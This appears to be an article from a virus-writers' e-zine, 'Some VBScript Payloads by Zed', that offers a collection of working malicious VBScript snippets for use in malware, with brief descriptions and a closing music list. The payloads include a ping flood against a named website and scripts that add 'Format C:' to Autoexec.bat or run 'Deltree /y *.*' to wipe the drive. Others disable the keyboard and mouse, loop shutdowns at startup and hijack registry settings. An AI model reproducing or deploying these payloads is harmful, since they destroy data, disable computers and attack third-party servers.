<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="36.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="38.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Some VBScript Payloads by Zed</u></b>
<p><pre>--------Loop floppy disk read--------

Description: This payloads has to be one of the most annoying
non-damaging payloads that I can think of. It simply makes the
floppy disk drive read at an infinate loop.

Here is the code:
-------------------------------------

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set DriveA = fso.GetDrive("A:")
Do
If DriveA.IsReady Then DiskReady = True
Loop

-------------------------------------


--------DoS (Denial of Service) attack--------

Description: This code basically Pingfloods a specific webpage,
Link, FTP or whatever. However, just one computer doing a Pingflood
will not cause much damage, but if at least 30 computers were doing it,
it would.

Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.Run "Ping.exe -t -l 916 www.azoogle.com", 0, False

-------------------------------------


--------Change IE (Internet Explorer) homepage--------

Description: This just changes the homepage of IE using the registry.

Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.rrlf.de/"

-------------------------------------


--------File/Link execution loop--------

Decription: This code basically executes a File or web link on
a loop.

Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
Do
wsc.Run "http://www.rrlf.de/", 3, False
Loop

-------------------------------------


--------Change PC Owner name--------

Decription: Yes, it is pretty lame but you can change the computers
owner name by using the registry. By changing the owner name,
it would change the login name, user info, installation info, etc that
involves the computers owner name.


Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner", "Zed/[rRlf]"

-------------------------------------


--------Change PC Organization name--------

Decription: This is basically the same as the 'Change PC Owner'
component above.

Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization", "Zed Australia"

-------------------------------------


--------Format loop--------

Description: This code writes a batch command to format the computer
on the next system boot.

Here is the code:
-------------------------------------

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists("C:\Autoexec.bat") Then
Set WriteFormat = fso.OpenTextFile("C:\Autoexec.bat", 8)
WriteFormat.WriteLine "Echo y | Format C:"
WriteFormat.Close

-------------------------------------


--------Drive C Erase--------

Description: Practically the same as the format loop, but it happens
on the execution of the code, which is far more dangerous.

Here is the code:
-------------------------------------

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsc = CreateObject("WScript.Shell")
Set WriteFormat2 = fso.CreateTextFile("C:\Angry.bat", True)
WriteFormat2.WriteLine "Deltree /y *.*"
WriteFormat2.Close
wsc.Run "C:\Angry.bat", 0, False

-------------------------------------


--------Disable Keyboard and/or Mouse--------

Description: Really annoying, just uses the registry to disable the
Keyboard and/or Mouse.


Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
RegServ = "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
wsc.RegWrite RegServ & "\DisableKeybaord", "Rundll32.exe Keyboard,Disable"
wsc.RegWrite RegServ & "\DisableMouse", "Rundll32.exe Mouse,Disable"

-------------------------------------



--------Shut down loop--------

Decription: Just keeps shutting down the computer when windows starts
(very annoying).

Here is the code:
-------------------------------------

On Error Resume Next
Set wsc = CreateObject("WScript.Shell")
wsc.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ShutDownWindows", "Rundll32.exe User,ExitWindows"

-------------------------------------

Well, thats about it for now. I will also write code for worm spread
methods, infection routines, etc. I could do it now, but it is to damn 
hot in this room (Summer in Australia).
Feel free to email me about anything.

Some good Music:

Green Day/Desensitized
Green Day/Outsider
Green Day/Ha ha you're dead
Green Day/She
Green Day/Good Riddance
Green Day/FOD
Green Day/Tired of waiting for you
Green Day/You lied
Green Day/Rotting
Green Day/Macys day parade
Green Day/Minority
Green Day/Warning
Green Day/Redundant
Green Day/Scattered
Green Day/When I come around
Frenzal Rhomb/I Know Everything About Everything
Frenzal Rhomb/You can't move into my house
Frenzal Rhomb/You are not my friend
Frenzal Rhomb/Constable Care
Frenzal Rhomb/All your friends
Sum 41/Makes no differance
Grinspoon/More than you are
Grinspoon/Black friday
Grinspoon/Chemical Heart
Grinspoon/Ordinary
Grinspoon/Boltcutter
Good Charlote/Little things
Linkin Park/Pushing me away

...Well that's about all I can remember :)

</pre>
</body>
</html>